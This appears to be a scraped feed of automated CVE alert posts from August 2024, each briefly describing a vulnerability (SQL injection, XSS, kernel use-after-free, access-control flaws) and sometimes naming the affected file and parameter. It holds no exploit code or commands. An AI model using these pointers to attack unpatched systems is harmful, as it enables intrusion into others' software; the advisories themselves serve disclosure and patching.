drivers/scsi/sg.c:1112 sg_ioctl+0xa2/0x180 drivers/scsi/sg.c:1165 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:874 [inline] __se_sys_ioctl fs/ioctl.c:860 [inline] __x64_sys_ioctl+0x19d/0x220 fs/ioctl.c:860 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3a/0x80 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x44/0xae🎖@cveNotify |
|
| 2024-08-27 01:07:24 |
🚨 CVE-2024-7971Type confusion in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-26 23:37:25 |
🚨 CVE-2024-45036Tophat is a mobile applications testing harness. An Improper Access Control vulnerability can expose the `TOPHAT_APP_TOKEN` token stored in `~/.tophatrc` through use of a malicious Tophat URL controlled by the attacker. The vulnerability allows Tophat to send this token to the attacker's server without any checks to ensure that the server is trusted. This token can then be used to access internal build artifacts, for mobile applications, not intended to be public. The issue has been patched as of version 1.10.0. The ability to request artifacts using a Tophat API has been deprecated as this flow was inherently insecure. Systems that have implemented this kind of endpoint should cease use and invalidate the token immediately. There are no workarounds and all users should update as soon as possible.🎖@cveNotify |
|
| 2024-08-26 23:37:24 |
🚨 CVE-2024-43798Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. The Chisel server doesn't ever read the documented `AUTH` environment variable used to set credentials, which allows any unauthenticated user to connect, even if credentials were set. Anyone running the Chisel server that is using the `AUTH` environment variable to specify credentials to authenticate against is affected by this vulnerability. Chisel is often used to provide an entrypoint to a private network, which means services that are gated by Chisel may be affected. Additionally, Chisel is often used for exposing services to the internet. An attacker could MITM requests by connecting to a Chisel server and requesting to forward traffic from a remote port. This issue has been addressed in release version 1.10.0. All users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-08-26 19:37:44 |
🚨 CVE-2024-23086Apfloat v1.10.1 was discovered to contain a stack overflow via the component org.apfloat.internal.DoubleModMath::modPow(double. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-08-26 19:37:43 |
🚨 CVE-2024-26574Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe🎖@cveNotify |
|
| 2024-08-26 19:37:42 |
🚨 CVE-2024-1068The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins.🎖@cveNotify |
|
| 2024-08-26 19:37:38 |
🚨 CVE-2024-22936Cross-site scripting (XSS) vulnerability in Parents & Student Portal in Genesis School Management Systems in Genesis AIMS Student Information Systems v.3053 allows remote attackers to inject arbitrary web script or HTML via the message parameter.🎖@cveNotify |
|
| 2024-08-26 19:37:37 |
🚨 CVE-2024-25165A global-buffer-overflow vulnerability was found in SWFTools v0.9.2, in the function LineText at lib/swf5compiler.flex.🎖@cveNotify |
|
| 2024-08-26 19:37:33 |
🚨 CVE-2024-24337CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.🎖@cveNotify |
|
| 2024-08-26 19:37:32 |
🚨 CVE-2024-25313Code-projects Simple School Managment System 1.0 allows Authentication Bypass via the username and password parameters at School/teacher_login.php.🎖@cveNotify |
|
| 2024-08-26 19:37:31 |
🚨 CVE-2024-25189libjwt 1.15.3 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.🎖@cveNotify |
|
| 2024-08-26 19:37:26 |
🚨 CVE-2024-24260media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_subscribe_remove function at /uac/sip-uac-subscribe.c.🎖@cveNotify |
|
| 2024-08-26 19:37:25 |
🚨 CVE-2023-44031Incorrect access control in Reprise License Management Software Reprise License Manager v15.1 allows attackers to arbitrarily save sensitive files in insecure locations via a crafted POST request.🎖@cveNotify |
|
| 2024-08-26 19:07:30 |
🚨 CVE-2024-8169A vulnerability was found in code-projects Online Quiz Site 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file signupuser.php. The manipulation of the argument lid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 19:07:29 |
🚨 CVE-2024-8168A vulnerability was found in code-projects Online Bus Reservation Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument Username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 19:07:26 |
🚨 CVE-2024-8167A vulnerability was found in code-projects Job Portal 1.0. It has been classified as critical. Affected is an unknown function of the file /forget.php. The manipulation of the argument email/mobile leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 19:07:25 |
🚨 CVE-2024-8153A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/delete-bookmark.php. The manipulation of the argument bookmark leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 19:07:24 |
🚨 CVE-2024-8152A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /endpoint/add-bookmark.php of the component Parameter Handler. The manipulation of the argument name/url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 18:37:43 |
🚨 CVE-2024-43376Umbraco is an ASP.NET CMS. Some endpoints in the Management API can return stack trace information, even when Umbraco is not in debug mode. This vulnerability is fixed in 14.1.2.🎖@cveNotify |
|
| 2024-08-26 18:37:42 |
🚨 CVE-2024-7782The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the iconRemove function in versions 2.0 to 2.13.4. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).🎖@cveNotify |
|
| 2024-08-26 18:37:41 |
🚨 CVE-2024-7780The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to generic SQL Injection via the id parameter in versions 2.0 to 2.13.9 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-26 18:37:37 |
🚨 CVE-2024-7775The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary JavaScript file uploads due to missing input validation in the addCustomCode function in versions 2.0 to 2.13.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary JavaScript files to the affected site's server.🎖@cveNotify |
|
| 2024-08-26 18:37:36 |
🚨 CVE-2024-5940The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'handle_request' function in all versions up to, and including, 3.13.0. This makes it possible for unauthenticated attackers to edit event ticket settings if the Events beta feature is enabled.🎖@cveNotify |
|
| 2024-08-26 18:37:31 |
🚨 CVE-2024-5932The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.🎖@cveNotify |
|
| 2024-08-26 18:37:30 |
🚨 CVE-2024-22949JFreeChart v1.5.4 was discovered to contain a NullPointerException via the component /chart/annotations/CategoryLineAnnotation. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-08-26 18:07:27 |
🚨 CVE-2024-40788A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, tvOS 17.6, visionOS 1.3, macOS Sonoma 14.6. A local attacker may be able to cause unexpected system shutdown.🎖@cveNotify |
|
| 2024-08-26 18:07:26 |
🚨 CVE-2024-40787This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, macOS Sonoma 14.6. A shortcut may be able to bypass Internet permission requirements.🎖@cveNotify |
|
| 2024-08-26 17:37:32 |
🚨 CVE-2023-52545Vulnerability of undefined permissions in the Calendar app.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-08-26 17:37:26 |
🚨 CVE-2024-28678DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_description_main.php🎖@cveNotify |
|
| 2024-08-26 17:37:25 |
🚨 CVE-2023-7235The OpenVPN GUI installer before version 2.6.9 did not set the proper access control restrictions to the installation directory of OpenVPN binaries when using a non-standard installation path, which allows an attacker to replace binaries to run arbitrary executables.🎖@cveNotify |
|
| 2024-08-26 17:37:24 |
🚨 CVE-2024-0041In removePersistentDot of SystemStatusAnimationSchedulerImpl.kt, there is a possible race condition due to a logic error in the code. This could lead to local escalation of privilege that fails to remove the persistent dot with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-26 17:07:26 |
🚨 CVE-2024-29068In snapd versions prior to 2.62, snapd failed to properly check the filetype when extracting a snap. The snap format is a squashfs file-systemimage and so can contain files that are non-regular files (such as pipes or sockets etc). Various file entries within the snap squashfs image(such as icons etc) are directly read by snapd when it is extracted. An attacker who could convince a user to install a malicious snap whichcontained non-regular files at these paths could then cause snapd to blockindefinitely trying to read from such files and cause a denial of service.🎖@cveNotify |
|
| 2024-08-26 17:07:25 |
🚨 CVE-2024-1724In snapd versions prior to 2.62, when using AppArmor for enforcement of sandbox permissions, snapd failed to restrict writes to the $HOME/binpath. In Ubuntu, when this path exists, it is automatically added tothe users PATH. An attacker who could convince a user to install amalicious snap which used the 'home' plug could use this vulnerabilityto install arbitrary scripts into the users PATH which may then be runby the user outside of the expected snap sandbox and hence allow themto escape confinement.🎖@cveNotify |
|
| 2024-08-26 17:07:24 |
🚨 CVE-2024-7007Positron Broadcast Signal Processor TRA7005 v1.20 is vulnerable to an authentication bypass exploit that could allow an attacker to have unauthorized access to protected areas of the application.🎖@cveNotify |
|
| 2024-08-26 16:37:36 |
🚨 CVE-2023-7004The TTLock App does not employ proper verification procedures to ensure that it is communicating with the expected device, allowing for connection to a device that spoofs the MAC address of a lock, which compromises the legitimate locks integrity.🎖@cveNotify |
|
| 2024-08-26 16:37:32 |
🚨 CVE-2024-27205there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-26 16:37:31 |
🚨 CVE-2023-51281Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script firstname, "lastname", "middlename", "contact" and address parameters.🎖@cveNotify |
|
| 2024-08-26 16:37:30 |
🚨 CVE-2024-2055The "Rich Filemanager" feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user.🎖@cveNotify |
|
| 2024-08-26 16:37:26 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-08-26 16:37:25 |
🚨 CVE-2023-40283An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled.🎖@cveNotify |
|
| 2024-08-26 16:37:24 |
🚨 CVE-2023-4147A use-after-free flaw was found in the Linux kernel’s Netfilter functionality when adding a rule with NFTA_RULE_CHAIN_ID. This flaw allows a local user to crash or escalate their privileges on the system.🎖@cveNotify |
|
| 2024-08-26 16:07:26 |
🚨 CVE-2023-4921A use-after-free vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.When the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().We recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8.🎖@cveNotify |
|
| 2024-08-26 16:07:25 |
🚨 CVE-2023-4623A use-after-free vulnerability in the Linux kernel's net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.If a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.We recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f.🎖@cveNotify |
|
| 2024-08-26 15:07:27 |
🚨 CVE-2024-41849Adobe Experience Manager versions 6.5.20 and earlier are affected by an Improper Input Validation vulnerability that could lead to a security feature bypass. An low-privileged attacker could leverage this vulnerability to slightly affect the integrity of the page. Exploitation of this issue requires user interaction and scope is changed.🎖@cveNotify |
|
| 2024-08-26 15:07:26 |
🚨 CVE-2024-42786A SQL injection vulnerability in "/music/view_user.php" in Kashipara Music Management System v1.0 allows an attacker to execute arbitrary SQL commands via the "id" parameter of View User Profile Page.🎖@cveNotify |
|
| 2024-08-26 15:07:25 |
🚨 CVE-2024-42093In the Linux kernel, the following vulnerability has been resolved:net/dpaa2: Avoid explicit cpumask var allocation on stackFor CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumaskvariable on stack is not recommended since it can cause potential stackoverflow.Instead, kernel code should always use *cpumask_var API(s) to allocatecpumask var in config-neutral way, leaving allocation strategy toCONFIG_CPUMASK_OFFSTACK.Use *cpumask_var API(s) to address it.🎖@cveNotify |
|
| 2024-08-26 14:37:44 |
🚨 CVE-2023-3290A BOLA vulnerability in POST /customers allows a low privileged user to create a low privileged user (customer) in the system. This results in unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:37:40 |
🚨 CVE-2023-3289A BOLA vulnerability in POST /services allows a low privileged user to create a service for any user in the system (including admin). This results in unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:37:39 |
🚨 CVE-2023-3287A BOLA vulnerability in POST /admins allows a low privileged user to create a high privileged user (admin) in the system. This results in privilege escalation.🎖@cveNotify |
|
| 2024-08-26 14:37:38 |
🚨 CVE-2023-38053A BOLA vulnerability in GET, PUT, DELETE /settings/{settingName} allows a low privileged user to fetch, modify or delete the settings of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:37:34 |
🚨 CVE-2023-38050A BOLA vulnerability in GET, PUT, DELETE /webhooks/{webhookId} allows a low privileged user to fetch, modify or delete a webhook of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:37:33 |
🚨 CVE-2024-31756An issue in MarvinTest Solutions Hardware Access Driver v.5.0.3.0 and before and fixed in v.5.0.4.0 allows a local attacker to escalate privileges via the Hw65.sys component.🎖@cveNotify |
|
| 2024-08-26 14:37:32 |
🚨 CVE-2023-52342In modem-ps-nas-ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote information disclosure no additional execution privileges needed🎖@cveNotify |
|
| 2024-08-26 14:37:28 |
🚨 CVE-2024-29338Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/categories/delete/2.🎖@cveNotify |
|
| 2024-08-26 14:37:27 |
🚨 CVE-2024-25381There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content.🎖@cveNotify |
|
| 2024-08-26 14:37:26 |
🚨 CVE-2023-4993Improper Privilege Management vulnerability in Utarit Information Technologies SoliPay Mobile App allows Collect Data as Provided by Users.This issue affects SoliPay Mobile App: before 5.0.8.🎖@cveNotify |
|
| 2024-08-26 14:07:34 |
🚨 CVE-2024-44382D-Link DI_8004W 16.07.26A1 contains a command execution vulnerability in the jhttpd upgrade_filter_asp function.🎖@cveNotify |
|
| 2024-08-26 14:07:33 |
🚨 CVE-2024-44381D-Link DI_8004W 16.07.26A1 contains a command execution vulnerability in jhttpd msp_info_htm function.🎖@cveNotify |
|
| 2024-08-26 14:07:32 |
🚨 CVE-2023-38055A BOLA vulnerability in GET, PUT, DELETE /services/{serviceId} allows a low privileged user to fetch, modify or delete the services of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:07:31 |
🚨 CVE-2023-38054A BOLA vulnerability in GET, PUT, DELETE /customers/{customerId} allows a low privileged user to fetch, modify or delete a low privileged user (customer). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:07:27 |
🚨 CVE-2023-38051A BOLA vulnerability in GET, PUT, DELETE /secretaries/{secretaryId} allows a low privileged user to fetch, modify or delete a low privileged user (secretary). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:07:26 |
🚨 CVE-2023-38049A BOLA vulnerability in GET, PUT, DELETE /appointments/{appointmentId} allows a low privileged user to fetch, modify or delete an appointment of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 14:07:25 |
🚨 CVE-2023-38047A BOLA vulnerability in GET, PUT, DELETE /categories/{categoryId} allows a low privileged user to fetch, modify or delete the category of any user (including admin). This results in unauthorized access and unauthorized data manipulation.🎖@cveNotify |
|
| 2024-08-26 13:37:32 |
🚨 CVE-2024-8163A vulnerability classified as critical was found in Chengdu Everbrite Network Technology BeikeShop up to 1.5.5. Affected by this vulnerability is the function destroyFiles of the file /admin/file_manager/files. The manipulation of the argument files leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-26 13:37:31 |
🚨 CVE-2024-44558Tenda AX1806 v1.0.0.1 contains a stack overflow via the adv.iptv.stbpvid parameter in the function setIptvInfo.🎖@cveNotify |
|
| 2024-08-26 13:37:30 |
🚨 CVE-2024-44556Tenda AX1806 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function setIptvInfo.🎖@cveNotify |
|
| 2024-08-26 13:37:26 |
🚨 CVE-2024-45256An arbitrary file write issue in the exfiltration endpoint in BYOB (Build Your Own Botnet) 2.0 allows attackers to overwrite SQLite databases and bypass authentication via an unauthenticated HTTP request with a crafted parameter. This occurs in file_add in api/files/routes.py.🎖@cveNotify |
|
| 2024-08-26 13:37:25 |
🚨 CVE-2023-1989A use-after-free flaw was found in btsdio_remove in drivers\bluetooth\btsdio.c in the Linux Kernel. In this flaw, a call to btsdio_remove with an unfinished job, may cause a race problem leading to a UAF on hdev devices.🎖@cveNotify |
|
| 2024-08-26 13:07:25 |
🚨 CVE-2024-24051Improper input validation of printing files in Monoprice Select Mini V2 V37.115.32 allows attackers to instruct the device's movable parts to destinations that exceed the devices' maximum coordinates via the printing of a malicious .gcode file.🎖@cveNotify |
|
| 2024-08-26 12:37:30 |
🚨 CVE-2024-44939In the Linux kernel, the following vulnerability has been resolved:jfs: fix null ptr deref in dtInsertEntry[syzbot reported]general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN PTIKASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]CPU: 0 PID: 5061 Comm: syz-executor404 Not tainted 6.8.0-syzkaller-08951-gfe46a7dd189e #0Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024RIP: 0010:dtInsertEntry+0xd0c/0x1780 fs/jfs/jfs_dtree.c:3713...[Analyze]In dtInsertEntry(), when the pointer h has the same value as p, after writingname in UniStrncpy_to_le(), p->header.flag will be cleared. This will cause thepreviously true judgment "p->header.flag & BT-LEAF" to change to no after writingthe name operation, this leads to entering an incorrect branch and accessing theuninitialized object ih when judging this condition for the second time.[Fix]After got the page, check freelist first, if freelist == 0 then exit dtInsert()and return -EINVAL.🎖@cveNotify |
|
| 2024-08-26 12:37:26 |
🚨 CVE-2024-44565Tenda AX1806 v1.0.0.1 contains a stack overflow via the serverName parameter in the function form_fast_setting_internet_set.🎖@cveNotify |
|
| 2024-08-26 12:37:25 |
🚨 CVE-2024-41879Acrobat Reader versions 127.0.2651.105 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-08-26 12:37:24 |
🚨 CVE-2023-26315The Xiaomi router AX9000 has a post-authentication command injection vulnerability. This vulnerability is caused by the lack of input filtering, allowing an attacker to exploit it to obtain root access to the device.🎖@cveNotify |
|
| 2024-08-26 11:37:25 |
🚨 CVE-2024-43886In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Add null check in resource_log_pipe_topology_update[WHY]When switching from "Extend" to "Second Display Only" we sometimescall resource_get_otg_master_for_stream on a stream for the eDP,which is disconnected. This leads to a null pointer dereference.[HOW]Added a null check in dc_resource.c/resource_log_pipe_topology_update.🎖@cveNotify |
|
| 2024-08-26 11:37:24 |
🚨 CVE-2024-43885In the Linux kernel, the following vulnerability has been resolved:btrfs: fix double inode unlock for direct IO sync writesIf we do a direct IO sync write, at btrfs_sync_file(), and we need to skipinode logging or we get an error starting a transaction or an error whenflushing delalloc, we end up unlocking the inode when we shouldn't underthe 'out_release_extents' label, and then unlock it again atbtrfs_direct_write().Fix that by checking if we have to skip inode unlocking under that label.🎖@cveNotify |
|
| 2024-08-26 11:07:24 |
🚨 CVE-2022-1271An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.🎖@cveNotify |
|
| 2024-08-26 09:37:26 |
🚨 CVE-2024-8161SQL injection vulnerability in ATISolutions CIGES affecting versions lower than 2.15.5. This vulnerability allows a remote attacker to send a specially crafted SQL query to the /modules/ajaxServiciosCentro.php point in the idCentro parameter and retrieve all the information stored in the database.🎖@cveNotify |
|
| 2024-08-26 09:37:25 |
🚨 CVE-2024-43443Improper Neutralization of Input done by an attacker with admin privileges ('Cross-site Scripting') in Process Management modules of OTRS and ((OTRS)) Community Edition allows Cross-Site Scripting (XSS) within the Process Management targeting other admins.This issue affects: * OTRS from 7.0.X through 7.0.50 * OTRS 8.0.X * OTRS 2023.X * OTRS from 2024.X through 2024.5.X * ((OTRS)) Community Edition: 6.0.xProducts based on the ((OTRS)) Community Edition also very likely to be affected🎖@cveNotify |
|
| 2024-08-26 09:37:24 |
🚨 CVE-2024-43442Improper Neutralization of Input done by an attacker with admin privileges ('Cross-site Scripting') in OTRS (System Configuration modules) and ((OTRS)) Community Edition allows Cross-Site Scripting (XSS) within the System Configuration targeting other admins.This issue affects: * OTRS from 7.0.X through 7.0.50 * OTRS 8.0.X * OTRS 2023.X * OTRS from 2024.X through 2024.5.X * ((OTRS)) Community Edition: 6.0.xProducts based on the ((OTRS)) Community Edition also very likely to be affected🎖@cveNotify |
|
| 2024-08-26 08:37:25 |
🚨 CVE-2024-43884In the Linux kernel, the following vulnerability has been resolved:Bluetooth: MGMT: Add error handling to pair_device()hci_conn_params_add() never checks for a NULL value and could lead to a NULLpointer dereference causing a crash.Fixed by adding error handling in the function.🎖@cveNotify |
|
| 2024-08-26 08:37:24 |
🚨 CVE-2024-31380Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Oxygen Builder allows Code Injection. Vendor is ignoring report, refuses to patch the issue.This issue affects Oxygen Builder: from n/a through 4.9.🎖@cveNotify |
|
| 2024-08-26 07:37:25 |
🚨 CVE-2024-45256An arbitrary file write issue in the exfiltration endpoint in BYOB (Build Your Own Botnet) 2.0 allows attackers to overwrite SQLite databases and bypass authentication via an unauthenticated HTTP request with a crafted parameter. This occurs in file_add in api/files/routes.py.🎖@cveNotify |
|
| 2024-08-26 07:37:24 |
🚨 CVE-2024-45241A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.🎖@cveNotify |
|
| 2024-08-26 06:37:26 |
🚨 CVE-2024-7313The Shield Security WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2024-08-26 06:37:25 |
🚨 CVE-2024-41996Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.🎖@cveNotify |
|
| 2024-08-26 06:37:24 |
🚨 CVE-2024-43688cron/entry.c in vixie cron before 9cc8ab1, as used in OpenBSD 7.4 and 7.5, allows a heap-based buffer underflow and memory corruption. NOTE: this issue was introduced during a May 2023 refactoring.🎖@cveNotify |
|
| 2024-08-26 05:37:26 |
🚨 CVE-2024-6802A vulnerability, which was classified as critical, was found in SourceCodester Computer Laboratory Management System 1.0. Affected is an unknown function of the file /lms/classes/Master.php?f=save_record. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 05:37:25 |
🚨 CVE-2024-6731A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. This affects an unknown part of the file /Master.php?f=save_student. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 05:37:24 |
🚨 CVE-2024-6729A vulnerability was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /control/add_act.php. The manipulation of the argument aname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-26 03:37:25 |
🚨 CVE-2024-8073Improper Input Validation vulnerability in Hillstone Networks Hillstone Networks Web Application Firewall on 5.5R6 allows Command Injection.This issue affects Hillstone Networks Web Application Firewall: from 5.5R6-2.6.7 through 5.5R6-2.8.13.🎖@cveNotify |
|
| 2024-08-26 03:37:24 |
🚨 CVE-2024-42992Python Pip Pandas v2.2.2 was discovered to contain an arbitrary file read vulnerability.🎖@cveNotify |
|
| 2024-08-25 23:37:25 |
🚨 CVE-2024-8153A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/delete-bookmark.php. The manipulation of the argument bookmark leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 23:37:24 |
🚨 CVE-2024-8152A vulnerability was found in SourceCodester QR Code Bookmark System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /endpoint/add-bookmark.php of the component Parameter Handler. The manipulation of the argument name/url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-25 22:37:25 |
🚨 CVE-2024-8150A vulnerability was found in ContiNew Admin 3.2.0 and classified as critical. Affected by this issue is the function top.continew.starter.extension.crud.controller.BaseController#page of the file /api/system/user?deptId=1&page=1&size=10. The manipulation of the argument sort leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-25 22:37:24 |
🚨 CVE-2024-45258The req package before 3.43.4 for Go may send an unintended request when a malformed URL is provided, because cleanHost in http.go intentionally uses a "garbage in, garbage out" design.🎖@cveNotify |
|
| 2024-08-25 17:37:24 |
🚨 CVE-2023-48957PureVPN Linux client 2.0.2-Productions fails to properly handle DNS queries, allowing them to bypass the VPN tunnel and be sent directly to the ISP or default DNS servers.🎖@cveNotify |
|
| 2024-08-25 16:37:24 |
🚨 CVE-2024-20023In flashc, there is a possible out of bounds write due to lack of valudation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541638; Issue ID: ALPS08541638.🎖@cveNotify |
|
| 2024-08-25 15:37:25 |
🚨 CVE-2024-22060An unrestricted file upload vulnerability in web component of Ivanti Neurons for ITSM allows a remote, authenticated, high privileged user to write arbitrary files into sensitive directories of ITSM server.🎖@cveNotify |
|
| 2024-08-25 15:37:24 |
